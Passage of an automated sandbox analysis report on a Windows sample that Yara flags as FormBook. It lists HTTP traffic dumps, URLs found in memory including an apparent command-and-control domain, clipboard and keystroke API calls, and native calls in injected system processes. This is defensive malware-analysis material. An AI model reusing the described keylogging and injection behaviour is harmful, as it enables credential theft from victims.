91 3c 2a 6e b2 57 2b e9 37 97 2d 92 dc 1a 90 bf 17 c8 4e d3 ff a9 0d 06 06 cb 8e b6 94 86 52 08 9e f4 71 d0 26 68 43 58 00 80 01 30 ff b7 ac 14 4a 4e 19 09 1b d1 52 de 67 14 32 33 b5 01 fd bf aa de f3 4c cf 80 d9 00 66 57 69 56 b7 40 ca b3 77 27 e5 5f d5 61 7e f7 8c 74 d5 33 0a dd 7b 0e bd a7 d4 eb d8 0a 29 a2 04 45 a0 69 08 01 40 13 dc bb 0a 09 10 9b d9 d0 2c 02 40 04 58 3f 86 69 cd ae dd d3 76 ef 25 8a 88 f8 81 1a 93 d7 30 ab dd db dc d7 7d 66 b6 49 04 44 a3 44 51 31 5d 0e 4b db 6e df df 06 11 11 aa a4 aa 8f a1 da fd 03 a2 22 3f d9 cb 74 95 6b ee a5 c2 8a 55 8c 84 ba 14 02 26 3e dc bd 3b 85 56 cf 5e 75 f3 92 a0 61 1f 3f f4 71 30 f7 b4 38 bb 3e 09 e7 31 94 24 e4 2b ef c2 40 31 4b 82 a0 a3 46 51 af 28 9d ae a3 30 d0 fb 24 e6 6b a1 b1 cc 60 f1 eb ac c8 d9 83 0d 3e 7a bd 57 d4 8a 0b 53 ad 38 22 1b 56 fd 44 1c 8a e3 51 cc 44 48 fc 41 7d b8 6a 7c 50 ed b1 50 3e 7e f2 ea 6f f4 25 11 7d b0 04 d4 33 85 b5 99 ff df 26 51 02 ea 39 81 11 fe ef 4f 28 c3 94 09 4e 19 af 6a e6 d5 df 58 c0 3c 4d d3 ee 02 d9 f2 4f 1d 5d 72 77 5c 7c b5 df c5 11 c1 d8 00 13 71 fd c4 4c ff b5 c9 b3 6c 07 8f f6 15 af f0 ad f0 27 65 cd fe d5 3e a0 bb 77 5a 99 57 70 a8 cb 48 1a cf 0e ee 7e 83 50 9f a2 5d 44 4c 99 cd 9c 7d c5 6b 63 33 cf 67 02 0b fe 62 9f 35 90 e0 db 6e 2d 82 b2 66 16 8c 26 26 79 d8 3d dc f9 e0 5b 44 a9 fa 59 d2 17 8e ff 6f 36 6b 10 e5 8c a0 70 9b 7c 65 db 16 4d f0 b8 28 8e 35 90 ca f9 bd 27 2c 78 b8 3b 90 fd 3f 64 35 74 d8 da 17 f5 01 43 50 e6 e8 a1 84 91 1c 84 c7 8f 4e 93 c2 a3 f7 dc cf f6 33 cf 07 6e dd 71 df e7 66 d2 7e 56 5b 87 fb 19 80 2f e0 7e 96 2d 79 ca e7 fb d9 3a bf ac f3 fd 8c 50 82 97 40 0a 72 9c 8c ef 06 4a fc f9 08 Data Ascii: 508ff":DT~Xk31X_j|H2t%cdtew1askO!+^V|li3a8!co9d;L?yM$4xu;qf?BDV@57
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 2ea_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://rokeyfashion.store/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Sat, 11 Jan 2025 08:16:10 GMTserver: LiteSpeedData Raw: 35 30 39 30 0d 0a 94 96 17 66 22 ec 3a a9 fd 87 44 54 d5 7e 58 91 81 6b d6 0f 01 aa 33 31 c6 0d fd f1 eb cf bf bf 08 8c 9b f8 58 e7 f9 fe df 5f 6a ff ed fc 7c dd e8 9d 1a e8 48 32 e0 1d 97 74 d6 ed a4 d3 be 25 ce 63 64 74 b1 95 08 89 91 84 b1 87 f1 65 cb aa 77 f7 e7 95 31 ec 61 d5 a4 dc ca d4 01 c8 73 1c e7 6b 4f 81 84 21 0a 03 2b a0 ca 5e 87 ff f6 be 56 ff 9d fc 7c b1 6c 69 33 b5 1b 61 38 08 21 a5 63 6f 39 ce 64 3b f3 4c 3f f7 79 af 0b c1 91 4d b7 24 34 80 ec 78 1e f7 b6 f6 75 3b 71 9c f7 18 66 3f 0a 42 44 16 f9 04 b5 f5 56 40 35 d4 37 8b 5d 49 74 f0 e7 f7 a6 9f 7c 4b 67 0b 77 01 da 4d 82 5a d7 4a 3f a8 a3 84 55 98 7c b6 e8 9c 73 2f 78 53 c0 a8 80 51 01 a3 02 24 2b 65 64 09 d4 73 cf 2d ef cd 9b 91 3c 2a 6e b2 57 2b e9 37 97 2d 92 dc 1a 90 bf 17 c8 4e d3 ff a9 0d 06 06 cb 8e b6 94 86 52 08 9e f4 71 d0 26 68 43 58 00 80 01 30 ff b7 ac 14 4a 4e 19 09 1b d1 52 de 67 14 32 33 b5 01 fd bf aa de f3 4c cf 80 d9 00 66 57 69 56 b7 40 ca b3 77 27 e5 5f d5 61 7e f7 8c 74 d5 33 0a dd 7b 0e bd a7 d4 eb d8 0a 29 a2 04 45 a0 69 08 01 40 13 dc bb 0a 09 10 9b d9 d0 2c 02 40 04 58 3f 86 69 cd ae dd d3 76 ef 25 8a 88 f8 81 1a 93 d7 30 ab dd db dc d7 7d 66 b6 49 04 44 a3 44 51 31 5d 0e 4b db 6e df df 06 11 11 aa a4 aa 8f a1 da fd 03 a2 22 3f d9 cb 74 95 6b ee a5 c2 8a 55 8c 84 ba 14 02 26 3e dc bd 3b 85 56 cf 5e 75 f3 92 a0 61 1f 3f f4 71 30 f7 b4 38 bb 3e 09 e7 31 94 24 e4 2b ef c2 40 31 4b 82 a0 a3 46 51 af 28 9d ae a3 30 d0 fb 24 e6 6b a1 b1 cc 60 f1 eb ac c8 d9 83 0d 3e 7a bd 57 d4 8a 0b 53 ad 38 22 1b 56 fd 44 1c 8a e3 51 cc 44 48 fc 41 7d b8 6a 7c 50 ed b1 50 3e 7e f2 ea 6f f4 25 11 7d b0 04 d4 33 85 b5 99 ff df 26 51 02 ea 39 81 11 fe ef 4f 28 c3 94 09 4e 19 af 6a e6 d5 df 58 c0 3c 4d d3 ee 02 d9 f2 4f 1d 5d 72 77 5c 7c b5 df c5 11 c1 d8 00 13 71 fd c4 4c ff b5 c9 b3 6c 07 8f f6 15 af f0 ad f0 27 65 cd fe d5 3e a0 bb 77 5a 99 57 70 a8 cb 48 1a cf 0e ee 7e 83 50 9f a2 5d 44 4c 99 cd 9c 7d c5 6b 63 33 cf 67 02 0b fe 62 9f 35 90 e0 db 6e 2d 82 b2 66 16 8c 26 26 79 d8 3d dc f9 e0 5b 44 a9 fa 59 d2 17 8e ff 6f 36 6b 10 e5 8c a0 70 9b 7c 65 db 16 4d f0 b8 28 8e 35 90 ca f9 bd 27 2c 78 b8 3b 90 fd 3f 64 35 74 d8 da 17 f5 01 43 50 e6 e8 a1 84 91 1c 84 c7 8f 4e 93 c2 a3 f7 dc cf f6 33 cf 07 6e dd 71 df e7 66 d2 7e 56 5b 87 fb 19 80 2f e0 7e 96 2d 79 ca e7 fb d9 3a bf ac f3 fd 8c 50 82 97 40 0a 72 9c 8c ef 06 4a fc f9 08 Data Ascii: 5090f":DT~Xk31X_j|H2t%cdtew1askO!+^V|li3a8!co9d;L?yM$4xu;qf?BDV@57
                Source: HSxcaEmiOTH.exe, 00000006.00000002.2604361912.0000000005578000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rokeyfashion.store
                Source: HSxcaEmiOTH.exe, 00000006.00000002.2604361912.0000000005578000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rokeyfashion.store/nfd2/
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/
                Source: HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.livechatinc.com/tracking.js
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.min.js
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.plugins.min.js
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.js
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: TCPSVCS.EXE, 00000005.00000003.1853958039.0000000007431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shorty.bio/zSKcZ7
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.livechatinc.com/?welcome
                Source: TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.livechatinc.com/chat-with/13793973/
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003A6B0C
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003A6D07
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003A6B0C
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00392B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00392B37

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2604361912.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2601035129.00000000006A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2602376251.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658897103.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658225987.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2600811626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2602361204.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1658953431.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: This is a third-party compiled AutoIt script.0_2_00353D19
                Source: xaqnaB0rcW.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: xaqnaB0rcW.exe, 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3cba1e1e-8
                Source: xaqnaB0rcW.exe, 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 8SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_56604ef7-5
                Source: xaqnaB0rcW.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e9431e76-d
                Source: xaqnaB0rcW.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_03479444-6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C5B3 NtClose,2_2_0042C5B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E64340 NtSetContextThread,LdrInitializeThunk,5_2_02E64340
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E64650 NtSuspendThread,LdrInitializeThunk,5_2_02E64650
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62AF0 NtWriteFile,LdrInitializeThunk,5_2_02E62AF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62AD0 NtReadFile,LdrInitializeThunk,5_2_02E62AD0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02E62BE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02E62BF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02E62BA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62B60 NtClose,LdrInitializeThunk,5_2_02E62B60
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02E62EE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02E62E80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62FE0 NtCreateFile,LdrInitializeThunk,5_2_02E62FE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62FB0 NtResumeThread,LdrInitializeThunk,5_2_02E62FB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62F30 NtCreateSection,LdrInitializeThunk,5_2_02E62F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02E62CA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62C60 NtCreateKey,LdrInitializeThunk,5_2_02E62C60
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02E62C70
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02E62DF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62DD0 NtDelayExecution,LdrInitializeThunk,5_2_02E62DD0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02E62D30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02E62D10
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E635C0 NtCreateMutant,LdrInitializeThunk,5_2_02E635C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E639B0 NtGetContextThread,LdrInitializeThunk,5_2_02E639B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62AB0 NtWaitForSingleObject,5_2_02E62AB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62B80 NtQueryInformationFile,5_2_02E62B80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62EA0 NtAdjustPrivilegesToken,5_2_02E62EA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62E30 NtWriteVirtualMemory,5_2_02E62E30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62FA0 NtQuerySection,5_2_02E62FA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62F90 NtProtectVirtualMemory,5_2_02E62F90
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62F60 NtCreateProcessEx,5_2_02E62F60
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62CF0 NtOpenProcess,5_2_02E62CF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62CC0 NtQueryVirtualMemory,5_2_02E62CC0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62C00 NtQueryInformationProcess,5_2_02E62C00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62DB0 NtEnumerateKey,5_2_02E62DB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E62D00 NtSetInformationFile,5_2_02E62D00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E63090 NtSetValueKey,5_2_02E63090
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E63010 NtOpenDirectoryObject,5_2_02E63010
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E63D70 NtOpenThread,5_2_02E63D70
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E63D10 NtOpenProcessToken,5_2_02E63D10
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00429010 NtCreateFile,5_2_00429010
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00429170 NtReadFile,5_2_00429170
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00429260 NtDeleteFile,5_2_00429260
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00429300 NtClose,5_2_00429300
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00429450 NtAllocateVirtualMemory,5_2_00429450
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AEF08B NtQueryInformationProcess,5_2_00AEF08B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AEF1BE NtReadVirtualMemory,5_2_00AEF1BE
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AEF88D NtUnmapViewOfSection,5_2_00AEF88D
